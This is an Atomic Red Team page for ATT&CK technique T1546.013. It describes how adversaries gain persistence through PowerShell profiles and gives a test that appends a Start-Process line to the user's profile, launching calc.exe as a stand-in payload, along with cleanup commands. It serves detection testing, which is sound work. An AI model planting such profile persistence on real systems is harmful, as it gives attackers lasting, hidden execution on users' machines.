Skip to content
Atomic Red Team
atomics
T1546.013

T1546.013 - Event Triggered Execution: PowerShell Profile

Description from ATT&CK (opens in a new tab)

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when PowerShell (opens in a new tab) starts and can be used as a logon script to customize user environments.

PowerShell (opens in a new tab) supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell (opens in a new tab) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell (opens in a new tab) drives to gain persistence. Every time a user opens a PowerShell (opens in a new tab) session the modified script will be executed unless the -NoProfile flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)

An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)

Atomic Tests


Atomic Test #1 - Append malicious start-process cmdlet

Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched.

Supported Platforms: Windows

auto_generated_guid: 090e5aa5-32b6-473b-a49b-21e843a56896

Inputs:

NameDescriptionTypeDefault Value
exe_pathPath the malicious executablepathcalc.exe
ps_profilePowershell profile to usestring$profile

Attack Commands: Run with powershell!

Add-Content #{ps_profile} -Value ""
Add-Content #{ps_profile} -Value "Start-Process #{exe_path}"
powershell -Command exit

Cleanup Commands:

$oldprofile = cat $profile | Select-Object -skiplast 1
Set-Content $profile -Value $oldprofile

Dependencies: Run with powershell!

Description: Ensure a powershell profile exists for the current user
Check Prereq Commands:
if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Path #{ps_profile} -Type File -Force

T1546.012T1546.014